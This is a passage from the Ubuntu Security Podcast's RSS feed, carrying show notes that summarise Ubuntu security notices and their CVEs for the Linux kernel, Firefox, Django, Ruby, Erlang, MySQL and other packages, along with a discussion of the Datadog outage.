</ul>
</li>
<li>5.17</li>
<li>UAFs in TCINDEX, <code>io_uring</code>, logic issue in OverlayFS
(<a href="/episode-194/#usn-6057-1-linux-kernel--intel-iotg--vulnerabilities--03-31">[USN-6057-1] Linux kernel
(Intel IoTG) vulnerabilities from Episode 194</a>), race-condition in handling
of handling of copy-on-write read-only shared memory mappings - unpriv user
could then get write on these read-only mappings -&gt; privesc</li>
</ul>
<h3 id="usn-6072-1-linux-kernel--oem--vulnerabilities--02-31">[<a href="https://ubuntu.com/security/notices/USN-6072-1">USN-6072-1</a>] Linux kernel (OEM) vulnerabilities (02:31)</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-26545">CVE-2023-26545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23455">CVE-2023-23455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0386">CVE-2023-0386</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0468">CVE-2023-0468</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1829">CVE-2023-1829</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.0</li>
<li>UAFs in TCINDEX, <code>io_uring</code>, logic issue in OverlayFS</li>
</ul>
<h3 id="usn-6079-1-linux-kernel-vulnerabilities--02-49">[<a href="https://ubuntu.com/security/notices/USN-6079-1">USN-6079-1</a>] Linux kernel vulnerabilities (02:49)</h3>
<ul>
<li>25 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26544">CVE-2023-26544</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23455">CVE-2023-23455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23454">CVE-2023-23454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21106">CVE-2023-21106</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21102">CVE-2023-21102</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1652">CVE-2023-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1074">CVE-2023-1074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1073">CVE-2023-1073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0458">CVE-2023-0458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0394">CVE-2023-0394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0210">CVE-2023-0210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48424">CVE-2022-48424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48423">CVE-2022-48423</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4842">CVE-2022-4842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4129">CVE-2022-4129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36280">CVE-2022-36280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.19 22.10 / 22.04 Azure</li>
</ul>
<h3 id="usn-6080-1-linux-kernel-vulnerabilities--02-55">[<a href="https://ubuntu.com/security/notices/USN-6080-1">USN-6080-1</a>] Linux kernel vulnerabilities (02:55)</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20938">CVE-2023-20938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 22.04 / 20.04 HWE</li>
</ul>
<h3 id="usn-6081-1-linux-kernel-vulnerabilities--03-02">[<a href="https://ubuntu.com/security/notices/USN-6081-1">USN-6081-1</a>] Linux kernel vulnerabilities (03:02)</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 18.04 GA / 16.04 AWS (Ubuntu Pro)</li>
</ul>
<h3 id="usn-6073-1-usn-6073-2-usn-6073-3-usn-6073-4-cinder-glance-store-nova-os-brick-vulnerability--03-14">[<a href="https://ubuntu.com/security/notices/USN-6073-1">USN-6073-1</a>, <a href="https://ubuntu.com/security/notices/USN-6073-2">USN-6073-2</a>, USN-6073-3, <a href="https://ubuntu.com/security/notices/USN-6073-4">USN-6073-4</a>] Cinder, Glance Store, Nova, os-brick vulnerability (03:14)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2088">CVE-2023-2088</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Inconsistency between Cinder (block storage service of OpenStack) and Nova
(compute / virtual server provisioning) could result in storage volumes being
attached to the wrong compute instances - would happen when trying to detach a
volume from an instance</li>
<li>Lots of interacting components, all need a consistent view of the system etc</li>
</ul>
<h3 id="usn-6073-5-nova-regression">[<a href="https://ubuntu.com/security/notices/USN-6073-5">USN-6073-5</a>] Nova regression</h3>
<ul>
<li>Affecting Focal (20.04 LTS)</li>
<li>Above update meant that in some circumstances Nova would be unable to detach
volumes from instances</li>
</ul>
<h3 id="usn-6074-1-firefox-vulnerabilities--04-15">[<a href="https://ubuntu.com/security/notices/USN-6074-1">USN-6074-1</a>] Firefox vulnerabilities (04:15)</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32209">CVE-2023-32209</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32208">CVE-2023-32208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32206">CVE-2023-32206</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32216">CVE-2023-32216</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32215">CVE-2023-32215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32213">CVE-2023-32213</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32212">CVE-2023-32212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32211">CVE-2023-32211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32210">CVE-2023-32210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32207">CVE-2023-32207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32205">CVE-2023-32205</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>113.0</li>
</ul>
<h3 id="usn-6074-2-firefox-regressions--04-27">[<a href="https://ubuntu.com/security/notices/USN-6074-2">USN-6074-2</a>] Firefox regressions (04:27)</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32209">CVE-2023-32209</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32208">CVE-2023-32208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32206">CVE-2023-32206</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32216">CVE-2023-32216</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32215">CVE-2023-32215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32213">CVE-2023-32213</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32212">CVE-2023-32212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32211">CVE-2023-32211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32210">CVE-2023-32210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32207">CVE-2023-32207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32205">CVE-2023-32205</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>113.0.1 from upstream</li>
</ul>
<h3 id="usn-6075-1-thunderbird-vulnerabilities--04-36">[<a href="https://ubuntu.com/security/notices/USN-6075-1">USN-6075-1</a>] Thunderbird vulnerabilities (04:36)</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32206">CVE-2023-32206</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32215">CVE-2023-32215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32213">CVE-2023-32213</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32212">CVE-2023-32212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32211">CVE-2023-32211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32207">CVE-2023-32207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32205">CVE-2023-32205</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>102.11.0</li>
</ul>
<h3 id="usn-6060-3-mysql-regression--05-02">[<a href="https://ubuntu.com/security/notices/USN-6060-3">USN-6060-3</a>] MySQL regression (05:02)</h3>
<ul>
<li>Affecting Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)</li>
<li><a href="/episode-194/#usn-6060-1-usn-6060-2-mysql-vulnerabilities--07-40">[USN-6060-1, USN-6060-2] MySQL vulnerabilities from Episode 194</a></li>
<li>Latest upstream release 8.0.33 introduced a regression on 32-bit ARM (armhf) -
would crash on startup - to fix, reverted an upstream commit which was
introduced to help with performance of atomic operations</li>
</ul>
<h3 id="usn-6076-1-synapse-vulnerabilities--05-39">[<a href="https://ubuntu.com/security/notices/USN-6076-1">USN-6076-1</a>] Synapse vulnerabilities (05:39)</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16515">CVE-2018-16515</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5885">CVE-2019-5885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12423">CVE-2018-12423</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11842">CVE-2019-11842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10657">CVE-2018-10657</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12291">CVE-2018-12291</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18835">CVE-2019-18835</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Matrix homeserver</li>
<li>Various issues - signature checking on APIs, failure to properly apply event
visibility rules, DoS - exploited in the wild, insufficient randomness when
generating random IDs made them guessable, ability for unauthorised users to
hijack rooms, more predictable randomness which could allow remote attackers
to impersonate users, event spoofing due to improper signature validation -
some of these require to be the admin of a room or to have a malicious server
etc - but since Matrix is federated, this is not so implausible</li>
</ul>
<h3 id="usn-6078-1-libwebp-vulnerability--06-38">[<a href="https://ubuntu.com/security/notices/USN-6078-1">USN-6078-1</a>] libwebp vulnerability (06:38)</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1999">CVE-2023-1999</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Double free when handling crafted content</li>
</ul>
<h3 id="usn-6077-1-openjdk-vulnerabilities--06-45">[<a href="https://ubuntu.com/security/notices/USN-6077-1">USN-6077-1</a>] OpenJDK vulnerabilities (06:45)</h3>
<ul>
<li>7 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-21968">CVE-2023-21968</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21967">CVE-2023-21967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21954">CVE-2023-21954</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21939">CVE-2023-21939</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21938">CVE-2023-21938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21937">CVE-2023-21937</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21930">CVE-2023-21930</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream point releases
<ul>
<li>Most Ubuntu releases support more then 1 version of OpenJDK - this update is
for OpenJDK versions 20, 17, 11 and 8 across the various Ubuntu releases</li>
</ul>
</li>
</ul>
<h3 id="usn-6082-1-eventsource-vulnerability--07-02">[<a href="https://ubuntu.com/security/notices/USN-6082-1">USN-6082-1</a>] EventSource vulnerability (07:02)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1650">CVE-2022-1650</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>EventSource client for NodeJS - info leak - could leak cookies and
authorisation headers to third party applications - but should have been
sanitising headers to avoid this as per same-origin-policy</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="datadog-outage-and-management-of-security-updates--07-32">Datadog outage and management of security updates (07:32)</h3>
<ul>
<li><a href="https://newsletter.pragmaticengineer.com/p/inside-the-datadog-outage">https://newsletter.pragmaticengineer.com/p/inside-the-datadog-outage</a></li>
<li>Alex and Camila discuss a recent outage at Datadog on their Ubuntu systems
that was triggered by a security update for systemd and the pros and cons of
automatic security updates plus other approaches which can be taken to allow
updates to be applied in a more controlled manner</li>
<li><a href="https://ubuntu.com/blog/3-ways-to-apply-security-patches-in-linux">https://ubuntu.com/blog/3-ways-to-apply-security-patches-in-linux</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E195.mp3" length="27273549" type="audio/mpeg" /><itunes:duration>1618</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 194
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-194/</link>
          <pubDate>Thu, 11 May 2023 22:13:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>d87547b2d922d8c852d34984f55084ed7259f111427b0033cdc24964826fd80da3197901aea4989be293eef2ca3a65512db4a1d26f16ba1367ebe179c9562909</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 194</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          The team are back from Prague and bring with them a new segment, drilling into
  recent academic research in the cybersecurity space - for this inaugural segment
  new team member Andrei looks at modelling of attacks against network...
        
        ]]></itunes:subtitle>
        <itunes:summary>  The team are back from Prague and bring with them a new segment, drilling into
  recent academic research in the cybersecurity space - for this inaugural segment
  new team member Andrei looks at modelling of attacks against network intrusion
  detections systems, plus we cover the week in security updates looking at
  vulnerabilities in Django, Ruby, Linux kernel, Erlang, OpenStack and more.
  </itunes:summary>
        <description>  The team are back from Prague and bring with them a new segment, drilling into
  recent academic research in the cybersecurity space - for this inaugural segment
  new team member Andrei looks at modelling of attacks against network intrusion
  detections systems, plus we cover the week in security updates looking at
  vulnerabilities in Django, Ruby, Linux kernel, Erlang, OpenStack and more.
  </description>
        <googleplay:description>  The team are back from Prague and bring with them a new segment, drilling into
  recent academic research in the cybersecurity space - for this inaugural segment
  new team member Andrei looks at modelling of attacks against network intrusion
  detections systems, plus we cover the week in security updates looking at
  vulnerabilities in Django, Ruby, Linux kernel, Erlang, OpenStack and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>The team are back from Prague and bring with them a new segment, drilling into
recent academic research in the cybersecurity space - for this inaugural segment
new team member Andrei looks at modelling of attacks against network intrusion
detections systems, plus we cover the week in security updates looking at
vulnerabilities in Django, Ruby, Linux kernel, Erlang, OpenStack and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>57 unique CVEs addressed</p>
<h3 id="usn-6054-1-django-vulnerability--00-55">[<a href="https://ubuntu.com/security/notices/USN-6054-1">USN-6054-1</a>] Django vulnerability (00:55)</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-31047">CVE-2023-31047</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Django supports file uploading via various form constructs - it then performs
validation on the file</li>
<li>Was possible to upload multiple files via the form by attacking more than one
HTML attribute to the form - in this case though only the last file would be
validated - and so other files would escape validation</li>
<li>Fixed to have Django raise an error in the case that an application tries to
use these forms for multiple files and adds a new option to restore the old
behaviour if really desired - AND it adds support for validating all files in
this case.</li>
</ul>
<h3 id="usn-6055-1-ruby-vulnerabilities--02-11">[<a href="https://ubuntu.com/security/notices/USN-6055-1">USN-6055-1</a>] Ruby vulnerabilities (02:11)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28756">CVE-2023-28756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28755">CVE-2023-28755</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Two ReDoS issues - ability to cause a CPU-based DoS through crafted input that
is then validated by a regex which takes an inordinate amount of time to run
<ul>
<li>one in URI parsing and the other in Time parsing</li>
</ul>
</li>
</ul>
<h3 id="usn-6055-2-ruby-regression--03-11">[<a href="https://ubuntu.com/security/notices/USN-6055-2">USN-6055-2</a>] Ruby regression (03:11)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28755">CVE-2023-28755</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>The URI parser regex fix caused a regression and so was reverted - is still
under investigation and hope to fix it again in a future update</li>
</ul>
<h3 id="usn-6056-1-linux-kernel--oem--vulnerability--03-13">[<a href="https://ubuntu.com/security/notices/USN-6056-1">USN-6056-1</a>] Linux kernel (OEM) vulnerability (03:13)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in Xen Plan 9 file system protocol -&gt; DoS / info leak</li>
</ul>
<h3 id="usn-6057-1-linux-kernel--intel-iotg--vulnerabilities--03-31">[<a href="https://ubuntu.com/security/notices/USN-6057-1">USN-6057-1</a>] Linux kernel (Intel IoTG) vulnerabilities (03:31)</h3>
<ul>
<li>10 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-26545">CVE-2023-26545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1652">CVE-2023-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1074">CVE-2023-1074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1073">CVE-2023-1073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0394">CVE-2023-0394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4842">CVE-2022-4842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47929">CVE-2022-47929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4129">CVE-2022-4129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0386">CVE-2023-0386</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1281">CVE-2023-1281</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OverlayFS is a union file-system, allowing one FS to be stacked on top of
another - often used for things like schroots where you want to have the
pristine source and then a working session chroot where you can make changes
and then finally dispose of the whole thing back to the original
<ul>
<li>Interaction with setuid binaries and the nosuid mount option - nosuid means
the suid bit is ignored - in this case, if had setup an overlay with the
base file-system mounted nosuid, then in some cases it would be possible to
copy up an suid binary as an unprivileged user and have it retain the suid
bit - and then the user could just execute it to gain root privileges</li>
</ul>
</li>
<li>UAF in Traffic-Control Index (TCINDEX) filter - found in March this year</li>
</ul>
<h3 id="usn-6058-1-linux-kernel-vulnerability--05-45">[<a href="https://ubuntu.com/security/notices/USN-6058-1">USN-6058-1</a>] Linux kernel vulnerability (05:45)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1829">CVE-2023-1829</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Another UAF in Traffic-Control Index (TCINDEX) filter from April this year -
seems upstream is sick of these UAFs in TCINDEX so their fix simply removes
this classifier from the kernel and hence so does ours - in general we try not
to introduce breaking changes but in this case prefer to stay consistent with
upstream - also upstream say this does not have many known users anyway</li>
</ul>
<h3 id="usn-6059-1-erlang-vulnerability--06-23">[<a href="https://ubuntu.com/security/notices/USN-6059-1">USN-6059-1</a>] Erlang vulnerability (06:23)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37026">CVE-2022-37026</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly maintain state during TLS handshake when validating client
certificate - basically a malicious client could send the certificate and then
simply omit the TLS handshake message which tells the server to validate the
cert and the server state would then show the cert had been validated</li>
<li>Note only affects Erlang applications that use client certificates for
authentication (ie. the <code>'{verify, verify_peer}'</code> SSL option)</li>
<li>Still planning to try and update erlang in bionic (18.04 LTS) but backport is
more complicated</li>
</ul>
<h3 id="usn-6060-1-usn-6060-2-mysql-vulnerabilities--07-40">[<a href="https://ubuntu.com/security/notices/USN-6060-1">USN-6060-1</a>, <a href="https://ubuntu.com/security/notices/USN-6060-2">USN-6060-2</a>] MySQL vulnerabilities (07:40)</h3>
<ul>
<li>20 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-21982">CVE-2023-21982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21980">CVE-2023-21980</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21977">CVE-2023-21977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21976">CVE-2023-21976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21972">CVE-2023-21972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21966">CVE-2023-21966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21962">CVE-2023-21962</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21955">CVE-2023-21955</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21953">CVE-2023-21953</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21947">CVE-2023-21947</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21946">CVE-2023-21946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21945">CVE-2023-21945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21940">CVE-2023-21940</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21935">CVE-2023-21935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21933">CVE-2023-21933</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21929">CVE-2023-21929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21920">CVE-2023-21920</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21919">CVE-2023-21919</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21912">CVE-2023-21912</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21911">CVE-2023-21911</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
